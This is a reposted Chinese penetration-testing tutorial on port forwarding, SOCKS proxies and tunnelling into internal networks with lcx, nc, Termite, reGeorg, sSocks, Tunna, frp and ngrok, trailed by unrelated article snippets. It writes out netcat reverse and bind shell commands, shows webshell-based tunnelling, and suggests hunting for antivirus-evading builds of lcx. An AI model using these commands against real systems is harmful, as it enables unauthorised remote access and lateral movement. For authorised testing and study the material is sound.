端口转发与代理工具 内网代理 内网反弹代理

目录

一、LCX

二、nc 反弹

三、socks代理工具

四、frp 内网穿透利器

五、ngrok 内网穿透


理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的

注:文中提到的所有工具下载地址 GitHub - Brucetg/Pentest-tools: 内网渗透工具

一、LCX

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,

Windows版使用方法如下:

lcx有两大功能:

1)端口转发(listen和slave成对使用)

2)端口映射(tran)

1、lcx 内网端口转发

1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口

例如:

lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389

意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口

2.公网主机 上执行 Lcx.exe –listen 公网主机端口1 公网主机端口2

例如:

lcx.exe –listen 4444 5555

意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。

此时,RDP 连接,Windows 命令行下输入mstsc,即可打开远程桌面连接:

内网渗透之端口转发与代理

如果是在公网主机上操作,计算机那栏只需要输入 127.0.0.1:5555,即可;如果是在本地主机上操作,则输入 公网主机ip:5555 ,然后输入用户名和密码,即可连接到内网主机。

2、本地端口转发

由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,

目标主机上执行:

lcx -tran 53 目标主机ip 3389

这时我们可以直接远程桌面连接到到 目标主机IP:53

注:软件可能会被杀软查杀,可自行寻找免杀版本。

Linux版使用方法:

例如:

先在具有公网ip的主机上执行:

./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777

意思是监听来自6666端口的请求,将其转发到7777端口

再在内网主机上执行:

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666

意思就是将内网主机22端口的流量转发到公网主机的6666端口。

然后在Linux系统命令行下执行

ssh 公网主机ip 7777

即可连接内网主机。

二、nc 反弹

nc使用方法:

反向连接

在公网主机上进行监听:

nc -lvp 4444

内网渗透之端口转发与代理

在内网主机上执行:

nc -t -e cmd.exe 公网主机ip 4444

上述命令中 -t 参数是指通过telnet模式执行cmd.exe,可省略。

成功后即可得到一个内网主机的cmd shell。

正向连接

远程主机上执行:

nc -l -p 4444 -t -e cmd.exe

本地主机上执行:

nc -vv 远程主机ip 4444

成功后,本地主机就获得了远程主机的一个cmd shell。

三、socks代理工具

1). Termite 是EW(EarthWorm)的最新版,官方链接: Termite

主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便

使用方法,以Windows平台为例:

管理端:

客户端:

客户端执行:

agent_windows_x86.exe -l  4444

管理端执行:

admin_windows_x86.exe -c 127.0.0.1 -p 4444

将新的agent加入拓扑:

agent_windows_x86.exe -c 127.0.0.1 -p 4444

具体使用方法可参考: http://rootkiter.com/Termite/README.txt

Usage

1.以服务模式启动一个agent服务。

$ ./agent -l 8888

2.令管理端连接到agent并对agent进行管理。

$ ./admin -c 127.0.0.1 -p 8888

3.此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。

help

4.通过show指令可以得到当前agent的拓扑情况。

show 0M +– 1M 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 其中1 为节点的ID号, M为MacOS系统的简写,Linux为L,Windows简写为W。

5.将新agent加入当前拓扑

./agent -c 127.0.0.1 -p 8888

6.此时show指令将得到如下效果 0M +– 1M | +– 2M 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。

7.在2节点开启socks代理,并绑定在本地端口

goto 2 将当前被管理节点切换为 2 号节点。socks 1080 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。

8.在1号节点开启一个shell并绑定到本地端口

goto 1shell 7777 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell.

9.将远程的文件下载至本地

goto 1downfile 1.txt 2.txt 将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt

10.上传文件至远程节点

goto 2upfile 2.txt 3.txt 将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt

11.端口转接

goto 2 lcxtran 3388 10.0.0.1 3389 以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口

2). reGeorg 工具地址: GitHub - sensepost/reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。

使用方法(详见github):

3). sSocks 工具地址: sSocks (Socks5 Server) download | SourceForge.net

sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.14

下载解压后,执行命令编译。

./configure && make

(这里我提供的压缩包中该软件是已经编译好的!)

编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:

程序功能:

nsocks 类似通过Socks5代理后的netcat,可用来测试socks server ssocksd 用来开启Socks5代理服务 ssocks 本地启用Socks5服务,并反弹到另一IP地址 rcsocks 接收反弹过来的Socks5服务,并转向另一端口

公网主机使用 rcsocks
内网主机使用 rssocks

使用示例:

假设 公网主机ip是 192.168.50.202

192.168.50.202 公网主机上执行:

./rcsocks -l 4444 -p 5555 -vv

5555 是内网主机 使用 rssocks 连接的端口

4444 是代理端口 用作代理服务器  但真正执行代理功能的是 内网主机 具体代理流程是

我的电脑 -> 公网主机 4444端口 -> 内网主机 -> 我需要访问的网站

内网主机上执行:

./rssocks -s 192.168.50.202:5555 -vv

这时本地主机可以通过访问公网主机的 4444 端口访问内网主机。

4). proxychains 工具地址址:ProxyChains - TCP and DNS through proxy server. HTTP andSOCKS

Ubuntu 下可直接执行以下命令安装:

sudo apt-get updatesudo apt-get install proxychains

Proxychains 是一款 LINUX 平台下可以实现全局代理的软件,性能相当稳定可靠。在使任何程序通過代理上网,允許 TCP 和 DNS 通過代理隧道,支持 HTTP、SOCKS4、SOCKS5 類型的代理服务器,支持 proxy chain,即可配置多个代理,同一個 proxy chain 可使用不同类型的代理服务器。

网上有很多该工具的使用介绍,请自行根据需要查找。

5). Tunna 工具地址: GitHub - SECFORCE/Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

该工具使用的先决条件:

能够在远程服务器上上传webshell

使用方法:

python proxy.py -u <remoteurl> -l <localport> [options]

options:

--help, -h 显示此帮助信息并退出--url=URL, -u URL 为远程webshel​​l的URL--lport=LOCAL_PORT, -l LOCAL_PORT代表本地侦听端口--verbose, -v 详细(输出数据包大小)--buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP请求大小(一些网站对大小有限制)

No SOCKS Options:

如果使用SOCKS代理,选项将被忽略

--no-socks, -n 不使用 Socks 代理--rport=REMOTE_PORT, -r    REMOTE_PORT远程服务端口,供webshel​​l连接--addr=REMOTE_IP, -a REMOTE_IP 远程webshel​​l连接到的地址(默认为 127.0.0.1)

上游代理选项:

通过本地代理进行隧道连接

--up-proxy=UPPROXY, -x UPPROXY上游代理(http://proxyserver.com:3128)--auth, -A 上游代理需要认证

高级选项:

--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging线程间隔(默认值为0.5)--start-ping, -s 首先启动ping线程 - 一些服务首先发送数据(例如,SSH)--cookie, -C 请求cookies--authentication, -t 基本认证

使用方法示例:

内网主机为Windows:

python proxy.py -u http://10.3.3.1/test/conn.aspx -l 4444 -r 3389 -v

其中:

-l 表示本地监听的端口

-r 远程要转发的端口

-v 详细模式

如果内网主机为Linux,则可以将22端口转发出来,更详细的使用方法请参考github上面的说明。

四、frp 内网穿透利器

frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。

工具地址: GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.

frp 的作用

利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。

对于 http, https 服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个80端口。

利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。

Windows平台文件目录如下:

其中frpc.ini和frpc_full.ini都为客户端配置文件,其中frpc_full.ini包括所有配置信息,我们可参考它来修改frpc.ini文件作为我们的配置文件,同理,frps.ini为服务器端配置文件。

frp服务端配置文件示例:

#frps.ini    [common]
bind_addr = 0.0.0.0
bind_port = 7000
vhost_http_port = 80
vhost_https_port = 443
dashboard_port = 7500
dashboard_user = {username}
dashboard_pwd = {password}privilege_mode = true
privilege_token = {privilege_token}[http]
type = http
auth_token = {auth_token}
custom_domains = {cudtom_domains}[https]
type = https
auth_token = {auth_token}
custom_domains = {custom_domains}

实际使用时请将上述配置中的花括号处内容替换为自己的配置。比如将 {username} 替换为 admin。

启动frp服务器端:

frps.exe -c frps.ini

浏览器访问: 127.0.0.1:7500,输入frps.ini中配置的用户名和密码即可进入控制面板:

frp客户端配置示例:

#frpc.ini[common]
server_addr = xxx
server_port = 7000
auth_token = {auth_token}
privilege_token = {privilege_token}[http]
type = http
local_ip = 127.0.0.1
local_port = 80[https]
type = https
local_ip = 127.0.0.1
local_port = 443[ssh]
type = tcp
local_port = 22
remote_port = 5555

注意frp客户端和服务端的 auth_token 和 privilege_token 等要保持一致。

启动frp客户端:

frpc.exe -c frpc.ini

更多使用方法详见 frp/README_zh.md at master · fatedier/frp · GitHub

五、ngrok 内网穿透

工具地址: ngrok - download

ngrok支持Windows、Linux、Mac OS X等多个平台,可自行选择需要的版本来下载使用

分为免费版本和收费版本:

使用方法:

这里仅简单演示下Windows平台上的使用:

首先在内网主机上执行(内网主机需安装Python):

python -m SimpleHTTPServer 8089

我这里在Windows下用Python 2.7来演示,就执行:

py -2 -m SimpleHTTPServer 8089

将ngrok上传至内网主机并启动ngrok:

ngrok.exe http 8089

这时我们只需要在浏览器中访问:

http://cdb0e21b.ngrok.io
或者https://cdb0e21b.ngrok.io

即可通过HTTP或者HTTPS来访问内网主机上的文件。

当然ngrok还有很多其他功能,更多使用方法请参考官方文档: ngrok – documentation

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/9457.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Langchain对设置代理地址

可以通过如下方式对ChatOpenAI设置代理地址api_base from langchain.chat_models import ChatOpenAI import os OPENAI_API_BASEhttps://xxx/v1 openaichat ChatOpenAI(model_name"gpt-3.5-turbo", api_baseOPENAI_API_BASE) 参考源码如下 langchain源码 openai源…

巧用chatGPT解决生产者消费者问题

背景 学校的操作系统课程布置了一项实验&#xff0c;是关于生产者消费者问题的&#xff0c;一开始毫无头绪&#xff0c;通过搜索引擎搜索出来的内容也五花八门&#xff0c;之后就想着能不能借助chatGPT解决这一个实验。 实验要求 1.编写程序解决生产者与消费者问题&#xff…

用户注册页面接入短信验证功能的注意点?

网站或者app的用户注册页面&#xff0c;在接入手机短信验证接口的时候&#xff0c;多少都会遇到一些问题&#xff0c;这里就将这些问题及处理方案分享一下&#xff1a; 一、注册页面被刷 如果注册页面未做必要的防范的话&#xff0c;页面上的短信接口很容易被刷&#xff0c;造…

tp短信验证码(配置以及使用)

阿里云短信验证码 今天搞了一个短信的验证码&#xff0c;用的是阿里云的平台&#xff0c;https://cn.aliyun.com/ss/?k%E7%9F%AD%E4%BF%A1api&#xff0c;免费的验证码测试&#xff0c;不用充钱了。阿里的api有很多也有很多免费测试的接口&#xff08;其实冲一块钱&#xff0c…

tp6 短信发送验证码

更改配置文件 app.php 里添加 //前端模块default_module >home,在config文件下cache.php里面去添加redis配置 // 缓存连接方式配置stores > [file > [// 驱动方式type > File,// 缓存保存目录path > ,// 缓存前缀prefix > ,// 缓存有效期…

有了域名想绑定域名邮箱?拥有域名后,如何免费绑定邮箱呢?如何使用【昵称@你的.域名】收发邮件

有了域名想绑定域名邮箱&#xff1f;拥有域名后&#xff0c;如何免费绑定邮箱呢&#xff1f;如何使用【昵称你的.域名】收发邮件 前提&#xff1a; 如文章标题&#xff0c;此篇文章的前提是“已经拥有了自己的域名” 有了自己的域名后&#xff0c;采用本篇文章的方式&#xf…

ios系统邮件怎么绑定QQ邮箱

一、做准备工作&#xff0c;开启IMAP/SMTP服务&#xff0c;怎么开启的教程就在↓如何开启QQ邮箱IMAP/SMTP服务&#xff1f;分享开启方法 - 三好电商网 然后你就获得了一串授权码 二、选择“邮件”app打开以下页面 三、选择QQ邮箱打开以下页面 四、电子邮件就填你的QQ邮箱账号…

其他邮箱如何绑定到常用的邮箱

背景介绍&#xff01; 一般我们国人最最最常用的邮箱就是QQ邮箱了&#xff0c;能推送到QQ、能搞成自己喜好的风格等等功能确实值得青睐。 最大的优点还是&#xff1a;可以及时收到别人发来的消息 当然&#xff0c;还有其他的邮箱各有各自的用处。例如大学生母校为学生准备的…

ChatGPT 掀起抢人大战,提示词工程师年薪近34万

火爆的ChatGPT ChatGPT 引发的资本盛宴还在持续上演&#xff0c;每个人都在谈论它背后的AI技术&#xff0c;每个人都在担心自己会不会被AI替代&#xff0c;但很少有人注意到&#xff0c;这项技术带来的新就业岗位。 这种岗位被称为“提示工程师”(Prompt Engineer)&#xff0c;…

ChatGPT之父传奇:8岁会编程,16岁出柜,2个月做到月活过亿

雷递网 雷建平 2月5日 聊天机器人ChatGPT的爆火&#xff0c;推出仅仅2个月&#xff0c;就达到月活过亿&#xff0c;成为历史上增长最快的消费者应用程序。 根据Sensor Tower数据&#xff0c;TikTok在全球推出后用约9个月时间达到1亿用户&#xff0c;Instagram用了30个月才达到同…

最爱 ChatGPT,每天编码 300 行,月薪 8k-17k 占比骤减!揭晓中国开发者真实现状...

作者 | 郑丽媛 出品 | CSDN&#xff08;ID&#xff1a;CSDNnews&#xff09; 瞬息万变的技术圈&#xff0c;似乎随时都在给予技术人数不清的机遇与挑战&#xff1a; 过去一年&#xff0c;频繁出圈的虚拟人曾一度将元宇宙的热度推至巅峰&#xff0c;如今却逐渐“悄无声息”&…

ChatGPT爆火至今,国内十余家知名公司竞相入局!高质量文本标注需求不断

2022年底OpenAi推出chatGpt&#xff0c;爆火至今。 据《华尔街日报》报道&#xff0c;百度将于3月16日左右推出类似ChatGPT的聊天机器人。科大讯飞预计今年5月落地ChatGPT相关AI学习机 。与此同时&#xff0c;更有腾讯、华为、字节、京东、360、网易、快手等 10 余家企业宣布有…

2022年大数据产业规模已超1000亿,从ChatGPT的爆火看大数据行业发展

哈喽大家好&#xff0c;小编注意到最近一段时间ChatGPT突然爆火&#xff0c;可能很多朋友已经体验过了ChatGPT的智能程度&#xff0c;体验过的小伙伴们可以留言交流下心得哦&#xff01; 聊天机器人ChatGPT的交流模型在经过大数据的浇灌后&#xff0c;展现出了令人大吃一惊的智…

香港科技大学:期中报告使用 ChatGPT 可加分;爆谷歌、微软已在韩国开始裁员;美国最大加密货币银行宣布关闭|极客头条

「极客头条」—— 技术人员的新闻圈&#xff01; CSDN 的读者朋友们早上好哇&#xff0c;「极客头条」来啦&#xff0c;快来看今天都有哪些值得我们技术人关注的重要新闻吧。 整理 | 梦依丹 出品 | CSDN&#xff08;ID&#xff1a;CSDNnews&#xff09; 一分钟速览新闻点&…

ChatGPT API的使用(一)

OpenAI除了提供ChatGPT聊天功能外&#xff0c;还提供了功能强大的图片生成与编辑功能&#xff0c;以及代码注释、语音转换功能&#xff0c;而这些功能需要通过API进行访问。 首先需要生成您的帐户独有的 API 密钥。访问此页面并创建一个新的密钥。 在这里需要点击复制&#xf…

php实现通过api实现chatgpt

<?php $textphp你知道咋样区分不同的两台电脑吗通过程序; $headers[] "Content-Type: application/json"; $headers[] "Authorization: Bearer sk-pmnyMNsajmyQowmzVZFDT3BlbkFJym66WY5eZlCIh23N";//换成自己key $url"https://api.openai.com/v…

ChatGPT如何帮助科研人员写作?

Nature Portfolio. 《自然》旗下期刊与服务集合&#xff0c;致力于服务科学界&#xff0c;我们提供一系列高质量的产品和服务&#xff0c;涵盖生命科学、物理、化学和应用科学。其中&#xff0c;《自然》期刊&#xff08;Nature&#xff09;创立于1869年&#xff0c;是国际领先…

Ubuntu 语言配置修改为英文

1、通过locale命令查看当前Ubuntu的语言配置&#xff0c;如图显示为中文配置 2、打开配置文件&#xff0c;进行修改 3、在配置文件最后一行&#xff0c;添加如下内容 4、使配置生效 5、再次查看配置&#xff0c;已经改成英文的了 另外一种方式&#xff1a; 编辑文件 /etc/defa…

Windows 7 Tips: 如何更改系统的显示语言(图文教程)

本文适用于Windows Vista、Windows 7、Windows 8。 显示语言是指 Windows 在用户界面中的向导、对话框、菜单、帮助和支持主题以及其他项目中使用的语言。部分显示语言是默认安装的&#xff0c;除此以外的其他语言则需要安装语言文件。 通俗一点说&#xff0c;就是&#xff1a…

AI绘图教程【全面】

今年是AI技术大爆发的一年&#xff0c;几乎每一个人都对ChatGPT有所耳闻&#xff0c;每一周都有新的进展。事实上&#xff0c;ChatGPT已经成为很多人的实用工具&#xff0c;最简单的例子就是科研论文的润色&#xff0c;码农的基础代码编写和优化&#xff0c;这些是实打实有价值…